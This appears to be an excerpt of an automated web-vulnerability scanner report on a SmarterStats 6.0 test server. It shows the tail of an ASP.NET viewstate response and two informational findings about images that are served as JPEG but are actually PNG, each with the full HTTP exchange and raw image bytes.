Q8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawU8cmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9SYWRTdGFydERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFBEZvY0QGAMD4DFw1zQgFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK+KPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAIHDw8WEB8HBgDA+AxcNc0IHwgGAEDK+KPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fCQYAAGjBKVyhCR8QBQdyaUxhYmVsHxFoHwwFDFNtYXJ0ZXJUb29scx8KaB8IBgBAyvij6OAHHwYFEzIwMTAtMTAtMDktMDAtMDAtMDBkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFBEZvY0QGAMD4DFw1zQgFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK+KPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAILDxYCHwNoZAINDxYCHwNoZAIPDxYCHwNoZAIRDxYCHwNoZAITDxYCHwNoZAIXDxYCHwNoZAIZDxYCHwNoFgICAQ8QZGQWAGQCGw8WAh8DaGQCHQ8WAh8DaGQCHw8WAh8DaGQCIQ8PFgIfBgUKR2V0IFJlcG9ydGRkAiMPZBYCZg9kFgQCAQ8PFgIfBmRkZAIDDw8WAh8GZGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBRZjdGwwMCRNUEgkUmFkU3RhcnREYXRlBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBRRjdGwwMCRNUEgkUmFkRW5kRGF0ZQUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXIFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFy2i6SqU9sX2UGCANrrGpuPaZ9vy6xkf2p8L7PZhOpOzc=|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||86|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||82|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|70|formAction||frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

10.6. http://vulnerable.smarterstats.6.0.host:9999/Temp/0c2c2823b31f46149208732c08a4fee8.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/0c2c2823b31f46149208732c08a4fee8.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/0c2c2823b31f46149208732c08a4fee8.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:31:53 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BAE755A80"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...bIDATx^....,...q.9..#.9.8g..........0>.....06.s.\\p..s...#..zzF...n...:.W....H...Z.^R+\e.C.....Y..F...S.*@..A.F@....
.D...>............+@...
..T.
.Dl.T.
...A4.+..P.*@..P.*0........@....@.-.f.9.....j.m]l[.X,M.u6.*@..Q`Z ..f..S....1%...X....biR...?K..T.*0!..@Sl. r.M..5.x..I...@...x
L.D{p..Ad...$;...M...~ggg...+..|.A........@B.x..G..6..n..../.32.B...r.8.....W..#{.9t.Q..L.D..r50.......D.N5...^.e.u..f. .5...U.p>7.U.`u.&...=w.D......{zm..\.M.D.......8...r.........Qz3$..5.vgRK......z..-..g.......t.....k..(.f3...._.&=J.... ..R=A...#.I.#...!s.D...D...D...VC..;.A...AD..D2...".d...-G.R..t.H..Ss.!"..O.2CX.VU.)7vI..T.).. :.:.."s.'.i.l..)7vI..T.).E..$oufy....[... :4.);o.;M....""..Y... ".R!..... Z.......AD..D...yg.5{...D8#..".+1"....w> ......".H.J..F.9....7.h..A.q%.H..A...AD.i\. ..7k.}.B.g..A.q%.H...At.M... ".4.D.i..5.n. ..AD.i\. ..7k..`A.3.. ...A.Q. ... ".4.D.i..5..k!.3.. ...A.Qo. ..w...AD.i\. ..7k.}...g..A.q%.H...A.-."..D.....".zs..}.B@#..".+.D..f..-.pF..D.W".4...D+."..D.....".zs....B@#..".+.D..f.oZ... ".4.4k..oVf.*m]l.:l.u..P.X...M.g.1.... ..AD.]L..o.j]..?.\...x.m..^mLy.}p.N..4..}....l@t.....AD.]L..j}n6..D..iFG...O.4....'....$,O/.......5..).UW..M.&.EN.2>.~biR...D_......1"J..N.I........Dc......H.2.Wd...Q|.j..S.3.m.mR.yM.Dew.E>..u.].
D.%...4BIY,'].)k6    .U.    #"...,....}.`.:H.....s.........5.u3...g.. ..f....8P.'x...k...J...gJ.{...V...c.F..D=\6.D..IDD.Jo.b.Y_.._....Na*I#L/%O...kI..r]. ...n.P.i4>nI...<v@..=...o....*..f=}.../C...#".?I...Q8n....Ti..Z..+?.4.Y. J.}    j..A....@T....Q}.YS.q..A.#."..A.E."..D....F.Q8P.[..&....a.f....U.......(..e!.4.. ..%.)G......W...X..,../X... ".4.9.....]1....Ey5..k!..8.>oA.3.. ...v......x..h..L$..D.. .Y.Dw}....D....G.....\+.
&.j*5f^=.n. .Y.D.. ..AD.i.n4.......i*4v^5.......3.h..p..8o..(CZ..<"...5....o.Z.D...1@cD.L.-.DmcD..^S.=.....w..;.>..O[... ".4~(..2"j...vX.....y. ..G......S.D8#.."...."..F....
..W.".y..l.(....1@#.."......<.......^^=.p.....    .e.B:...1.@..!.. ]3..O1..D.c....q.}.FD8cD.L.-.D..!.5..Qd'.)..... .........Z."..D...]%.SFD........V;.LS.q..A.<}...J.-....L.wH..Z...J..[.. .Q...!..>    .;>n....-.x..Q{DT..H....QGD..c............".H....)#"....Q.    !_.. ..(h. ....".h. .<....AT..W......Qc.F..D...)".<....A.?......?>.5.. .xfF.U...    ....rO"n..........>lA.3.. .    .4.9.....x..;@1
..[... ".4^.1".<.|..Ad....gq.}...g..A.... ..d....Mx5.2.7.....B. ".f...1.O...@_.".Yc...hD.7."..D...@.<.~.}....\.u...8..6..
.K.z.)..D.#~.qAq.}...g..A4_..........F.Q...v]>...>.V-].X...-..A.;........-.pF..D3.Q:..+{...T3:jFE.4....#...........B@#.....(.R...NV2X<...q...XT,M..a@.;........,.pF..D3..@_.j.)...........q]....H.yg........|._._....r$.0...,A.T.......I...K5....dwJG4"..=.....#".Wg.G.y...-...j.#;?...^.b..x..;.. Z& \.$....9...e.....p.H.N..u...|}.....}..8A._..'k.S:. z...p..h..#.R..#..(.>....A....m....m.2.h..A..,    ........2..1...p.....    .e.B..I.....eH....7...(..>..^Q.........2..`.q... ..t..8..aA.3.. .DBU.    .....y.)..;...@.....D8#......c.k.._..y~    ".>..^Q...m... ".f.".#O;...Y...=4..r."..".g..5;.g....V...}..
6......g..A43....kU[!.;k...3?zZ."...n+.(....c.F..D3.Q.h......|.2..j..wMt;0.A.f."..D...e|...f.<...._..-=4..+..D.]....q.]cA.3.. .... *..h...3..?..V.z..vMt;0.D...4.H.....eH...G$y...Q...Y...,
..o2.h...    <.h>..=..D...Rzh\~#..".H.....#.pK..q...t.^..D.....g... .8......<K.rr.1R.,..,.O.v*...L$..D.=..~Cq...FD8cD..H....)#...}...*..W"..An..(...zc.F..D....D.Yc..c[.jj7B^=......,...Y... ".4.6.........z<.ZS....A....m.A.-...q.T..."..i].]3.c.'..D..9.6.q...FD8cD.L..D.aO.I. ..*.C....F..D....O.....a..9.......nE.[]...."....+q*...('G...f...=|.28.l@j..W....Q...5.....#"    L.<..    #........
.....nE.[]....-.pF..D.O..D.^..&..D...nu=A.L@H.3...."..i]...A...r...Q}9.....-.x..Q.........j...(.b..D...AD.I"....4.9..z.....d...._aA.3.. .x.$..v.4.9......,..F..D./].....z...fd]l[...I...|.\....F#......g..At.AT.M...6?)2E .&.z........-j...e.D8#....
.*...Or.M..5wb...^.....v.... ..K...AD.]P.U.>".K.Y5....i.&.z..ggg~g..\WbC..k>./../.......#k+K.-.d.....D.....p..[....^lA.3FD..RA.._.`...f.e.n    G.D.....AD..D..`u.?v.RmP:H.z}...?...@...E.D8#..".(..n0.:..0p}.9..)..S..?.g.......B. "..8..W[..,.a.cD...n.t4"......AD.i<k.cD}.o?..Cc.p..p....H.-...V....-U..eH.2..f....^...'..    .q.=.FD8cD.L..D..b...A..d.&,FAt.y... ".4N%..#....A..h.|\. ....".. .(.....pn..'...~.\c.F..D.WbD.Q.%..D..=n.P.D.. ..AD.i\. ..7..~m.... Z& ._.R.....eH..1.!...s{.<.8..m#".1"Z&.."    V'.G.5.~Rw... .<....D....$.cD4dD..k.....P#..".H..8.:".d.f.-...D.W.......Yr......I.~G.5.._..W.8..a#".1"bD.q'    ..5..k..@v..Q...tc.F..D..F.p^uD..@v....2.!...6wI..Z...........i6"..#.e.. .`u.y.........<.j..A.q?    .........`t.kv.S...AD..D...y...p..F.A.d."..D......i.k....n.....D...t..R...!L.N..T.H>5.n.c7@....O2.h....<.....j.......#....1.8..hA....P..C.Ww....U\...m. ..D.q.7.....,.p......).......>...m. ..D....zEA........0.a....M)o....u..P.....AA......A4...\....o...A....N....F).......3.h....5.!RI...>.}.....n...........D8...S..].c.....5P.....!A..R\....p.r@...    ".I..}.z5.r.....m.6.........u................ ..(...}....y.@.-.z.1.^..).ks.Ej.e.D    .GC. ...._....@......\4.FA......hx@. z..b]@w.mM..._Z]..s.........*....<......Q.svvf...].|.\.t.F............:"2-
..DD)o"G99.puf9)o..6.n9.........C.=$kU..r....Wm....w.s....i..P 2...s.Y....5)...T U...".N...T1..
P.....D2...
P.!. ..T....T....Q/...
P.!. ..T....T....Q/....7......(#../{...F......$,....nr.....k..S.D.......F.7u`e:a.....Q.2..4p]XN..&....p"#A4...=c.y...."&...(w.Au.(G..N,..R.M..r..... .H..m..H\TT..P.\....8.._..e.a..........R....... .H....e$.....'.r.Q.a..^p..W...h..k.C..A4........L    .^]&m.}..,..E..6iu.Q...B.(nu....z../Cq..=..V....q}.,g.D(....-G;..]....m...Y.e...`u5.b.....we.(c.T.......T.6./.Sk.h.!....~T.
$+@.%K..T.
.. ....~T.
$+@.%K..T.
.. ...v./.1[8..u.Z.#wm...*.u#@].l...,.r....lt]..t....RV(.~jeT.......&..jv.+v..s.......N..uv........o..h9..o..+._?|.s.......s.3....,..Sk....ng.2...e#.....].s.t{i..c..".T....r.W..4...F.a.}..~.E..RF......<VF.:*...J...K..u.Z..k..T....8F.O...T.....+.].....a.M.n].&eri
Xk......u...(..D.}.K.4.Q..PI:../.\u/..I@T... ..6.b.`..P.S
'.i...w._g.V...o_..VB....}...,...q...k.RLq....f0.TX.n.....T.[..C,..........t].^]....]y}.
.]....3"...*Mm..0.T.O.....).V.@D.;#......d..~.D
.......w    k.:.J....    .u..we...MK@....N.~....NLL...o.hv7F.
...<#..A..dQ.>..{.f...._5.X}.......m.jg.n@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....H6f..T...A.T....T@..A$......@*@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....J.!%..6d....IEND.B`.

10.7. http://vulnerable.smarterstats.6.0.host:9999/Temp/1039b7037bea4372821b6b290d0745da.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/1039b7037bea4372821b6b290d0745da.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/1039b7037bea4372821b6b290d0745da.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BE11F5300"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..!.IDATx^.].......bcc...1`.ec..\.[.s.f...........c..7....a!.+$..]qH..V+.....0...?.....W35.3.=..S]....Q......*...#........A.`..V...... .(!"1.A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@...............F....Zf.....M.6.l}8.^......A...JAD.0........jp....;. -_S~....^...TA@. .JAD.-.%.    U....$_ .h.e...w..A@.(.....".C>:..t.bH..p.DMGW...&...W../.ellL}...R.....6..._...\D...".A*.n...s.Hw..".A.(...(........!...(...!.n....f....m.,I>.qBD.(......!.,D..U.H.c.[.D.FD..E..iL..t......Q.+..{.N...BD}l.{.~.5k....i......."]6.i.$.n.....MZM!:u.:...Y...g.........BD.`(..S........y;u..1+..>C.....q.-&X...<.....YMBD..L.(D..Qg..RM.|.BD..$D..Qg!"6..IBD..L.(D..Qg.D...>S..pBj.C@.f}`."b......:D.}.....u......!"!"...-..S...O"z...."r.8...@.WG.N...>..._.B-.m7..HD$...P..
..C..'.-=.4.x.}X.#D$D.2...Bt..u.ID........2.!"!"...-..S...o"z...X.#D$D.2...Bt..u.ID.1."r.92X..Df.!:u.:."..|...1{...X. ..DD,C.[(D..Qg_D..|.....Od.......P..
..C....}:9..h..3X.#D$D.2...Bt..u.ED....D.v.<....    ...%o...:D.}...O=..h...Y.#D$D.2...Bt..u.ED..Y..h...Y.#D$D.2...Bt..u.ED...Tw.........{.(.....C....!.....j.UW..@""..X...P.N.....h..+.....6\y%.t....X...P.N......    ..P............U...!.....?.H.......q..DD.....e......3..\.vS.sp....`..#2.G.8",".8.U..:.4.u..
.j..}.$...c0.....rj    ..C..WDt.N;...:Jm..rN..q..6.p..O...=.-!".9.
..C....a........5C$3\......h7...V.c....$c.....>.\I.N...>..$...... ...;U.......^M..I.....60..[zU.....6^{-..T.......h.'......t.X._......u......u.^...uEB.)3.....)...f.....#2.u2~...BI)D..Qg.D45:.#...^.6_=..J..M..S..)...X..<...T..g3..Y...d..eCN.Bt..u.AD&.~..k.f...\. "...2..z3R.r7..!".N..Bt..u.ADHxED.....o..e....M.....</!.<...;D..Qg.D......]wU[..Nm..oXF.(...m`!!..!dW..S....".......h...Y6 D..&!".9.
..C............4u....X.!D$D.2...Bt..u.AD.....5.}....LG.H..e(y....!............4k......#]..1....S...."ZD.....k".~.-,...H""...-..S....".....y?C..o...Y.#D$D.2...Bt..u............NP3......Y.#D$D.2...Bt..u...L......D..id.........!..7....5t...m....Ho|...H""...-..S..s.D......}8...+...........!..7......q.6........&!D........!..7....ABBD..C.....jBt..u....y...wT3.i>.......2F..$!".9.
..C.9o"ZFI..v.E.\v..BD..C.....*Bt..u....y.w....    .l.....2k68P.j...C.9o"B..}{....6.(.$.~p...hp..5...!..7.=L+..R...K..e.o.2.YG$...P..
..C.9o"B.....$D..a$"r.f..Bt..u........=.0....u.&;4..DBD.c..!D..Q......_9.H!"..s...8(..    ..C.9O"2    .+.>Zm.."].....;.....rk...C.9O".....3{...C'":&h.}p"@.>|..s.....vwq....'Xwbh2..i..-.k.....f.].Y3...S^.D.bj....F.GKG.m..\"".9.
..C.9....5..Yg.i:...._..e.%!".    u.%.......>..hh...0.o.{.#..X6.D(D..Q.<..d.o...P...r.....QR...R7.P_NQ...w.....>.......@l ...../j..;.i......_..P.$"J ".J.....h...l    'I^""...&.bt...yFD+h...v....>........._...D...%.....%7...:D..$"$......F..Y.......4...z#"
...f....k.n............:D..$.'.=W.G..s...Z..}..:..d........s##Xw...^.._M...*...7.*Y...rCf.^.9.|/.5...h.!:u.:...........Q7..7)=s..%......N.....C.Q..?.U>.5k..E.i.h.)n..?.q.$!"78rj    ..C.9......~..".(28.......3,.....v    ..C.9/"2    ...~..|.y.....q..........s&..F9e....K.N...y..Ix}.... ..........^.8..k...C....9.n.!.6.&....NR.h.....].j..#".3....._....!.......u..Z..u'...M...a.x.....yu...!.......I...t.9....kY..1"2[vD.R....wJ.<K......5@.N...y..NxE.k......hnE>I.&D$D...!.6::..;.Q..>..l.....e..Xu./$D..    Ct..u.+".    ....6.k.)[...eD........un....dB "....).._...ZH.nc...%{.....5v.O..a.h.,.g..,.....%.?_}U.z......$.u.k$.>...j..gv..|#".]..@D..h.S^...........@NH.C.T.K.._k..m.....D..5.....q.|..h..g....9F...N.....>..r........>....6\Hx}...{|e...X.f.#.......t}7b....5A.Ho.....{......8........X......X.(...DDg4.+/...h..e..P..Nq.k.2. X7.k%....=.2s..,|%".....6....;..0XW.K.._+...?.....UG.%D...i":.........(...8G..._.`...$..M....2s......(-"b...4V...+o...z.B..y..Y.`.....MP..3.Uh...^.....}Oa.Q..8......X...#.G..'3._.j.7...Q.    ..... ..a...(z].8.?;...X#....BD9...h..SXe=.8........9../X7.^v..zM]..l..2V..,".!..9jIg.E...s..D...(..+L...9../X7.....%..q....w..Q.i. ..v..,.9.5".t/..f.:":.dvy..Cu.........'.s..^.n`..&t...^.|e......$....zOp....^...z.!.,{.....%..O<Q....E].......X/..O.....\ "c<.....VC]....SS...D"...)..d..u..u.s.C^.n`.<..~..X?.r.%..)IDT."....'..bCB.}.....m[.^."I......a.q..........5...S.e.V..a........|.]#.\.`..3{.r...dNDD..5FO...G..s.i...c.M.....m... ..+......`..3...8?.r....)u...F7.p.R......^.....{..F,+.=...:*.../X..RH..%......yfk...9DD|#....._<.$.h..gl.j...D.....8.?...v..:..4.O...#...M....!...mI.....o...}_............$?..D...4..|..8........`_...m.).u#...q%..4.c\.1"F.y. D.F3    ........u##X+...........Tl-...;.s............`......vK..../d5.DD}`.....=....g.L..e.N...F....g...."r`j...=6s.k&.....s8hxf.....M<....>2=>.M..R".DDY....z!m..m.|]......j ...Y:.5.G....#".D&...........BD...Y.`....K....#..\.BS"...h@"z.9{..=...dP!q.A..._u..yf.P.....n.%uDD+F.-.w.U-...>.......<.U....""ZIc.I>2=o..a..."".D....E.ao....;G..F..:....i.^K    .BD9Z."..tz...4..F.as.<#..;G...Su..6.......>.Y"..M.%......"..vp.k_..;.......Xc.-.s........%5..y..2F.S.M.h.oM'..........]E.....Iyf.|d......1..1..G..\..i..'........ffX.....sp0r%Su...T.<.~.....Xp...@D..^.iO,x.Q..
uqU.9\`....X#.c    ..    .q-&....Q..gYC3jH.....nZ..#cSg...X.f.R.Y?..|..,l%"J..r&"4.2Z..1#l25.Uu...?....52....`!"... ...C...QF...b.c..#C3g...X#e    .......l:.......DD>H..X~...a.FGY.$Te.....7W.kL..^_...~>"D....o...m........s8hr.*...YU.&-G.....>...DDi..G"zl..........x.BU....^GI.BD..*.*..Q.....y.. ..U.9r6..........}..R}c.Yg......D.q..)....p.u..+.=.D..}].|..:.-.Ue...Y......4u?B.fi..9@Dtv......1....#...'<B..BO.e..;..).$.Ue...Y............1.76.y&...GDt..p].....1....q,...A ..$.4....,...1.Fd]i]e.`Y.C.*c.-b..1.4....tT.....R7..........Q.....]2S..v......5.<...."....f.m....i1c..O.~:......T.j...1^.h'z..N.|...R0>.X...w.q.*.Y..P..X....hr%.76.q.....Q...h....u...l...."!.........,kw,TU....;..(.76.NDz6.5M.......`.}3Q..)5..m.3X..E(..3..F......:.c.aUWU......9~.1....B..}..@8..[.....r..]V.9Q .,.....,.p,TU.q..........U..
.k.y..z.5v.y..2.....Zf...4..^..Z..:.5P.n.*.8....wg...&"...cV6:0..*4...\@....O.^Uu.[.\.W.k.u?J.L8~...SYP........&".N.(..:..b.YZ...ASg...X.d..4|........V...LE....=.mO...s.,=..*b...0l...9."......D...(k.    ...6V.9<.C.c.....W......Ol<.dV.HD....@B......1CasU.9l.q)[E.1P.0...D...R.BD.>._Tyh.].rzl.*:.>.e..5...-...{.}b...8.DD).QQ$......6..U.98F..L....6..*.............%]TY.......z.U5.....\...>YXQm..BD.,.h"B...q.&...spq.C....D^..&.......|0..d...d.Oy.BD.7.]...h[."..:f...q..F..?/....[........M..>LYR...Eo....h.....N:.e22F.6FT0.=MK.m.`....Rr.
Q.<u..f.>....?h.3........s,t..7.n.,z...7i.@.(gg..^GD.......{[%.f12...>.D....8=Hg.?b. ..DN...^Y..2.;.ht[_.:.D.....DD....Y&.$....P?...,%g....CgCB.S..m.g{/7..Y32..Ul.F....<J..l}aR.(S.u....=.C..^J..n.okd.......v..!..........=H....a.......D...J]D[_.dFn...ED.....i:-.;Ndkd.F..|.z.....`.oS.....{.....n.Q.7u...1.....x....e*..h...YOdkd.`rRE.z..y.-........p..i.*..O''...Fot.0h.(.......<.x.n...ED.......]Odcd,..$....t~.O.d.0u.l..v.H..m7Mi..YM....~.."r.@...Qc...G....3.#s...*B.{P..P.$.....66.\.a...F.'.=W..e.o.q..lD"...h...e(/6.-..12..x..To.....V....<......sfy.At6$....j_#.K..O.M..z.S.........c.eA+D....m.'J...kd,.H.B.6fRV.q.z....Go..l7p..:.. fl.....
....DF.    ......lH..........t>..9.Wo..a@...UO!"N.......fY.r/-p.#e[.........m....7.r..o,..CL..ZM-..2.>x>.IF....v....
...Q.{..!.R..^..zHm[....XY[......OIE$............>b......p.s.]......<`).;....9...DDi..Cc..Aq..f.l..7'j=.b.6.........3.^.F/.\.fR..m.7..%...".+........R.^+....g..X.bZ.t;}E.=w.9.M...u....}.....~=.`A@.R.~<..4z....>D.R....i...)../...ST.W_........ iD..I...0....'............ .....o.h.u.Z.P......Q.Y'...'.#"8[.
.....S.0....,.f.....G.....r".w`..8.$....GI_......Q.qv..g..U".{..9..'...V'.?t[A..{....A...6.o.p...    ....^h'....L..md.^.:A/...1.....w$UGs..-.{t4d..q.BDq..q.,N.m...@Ze$.q2 CF......A....N.]VQ.2.Q.......!.DU.....o..;...dW..Z.....i.m.61.....2.M.(.}^..........w.t......7...\.,D.C........t..- .    j.2.w..^%#z.....UU'..(..C...C.....?.....M.=@...]@..
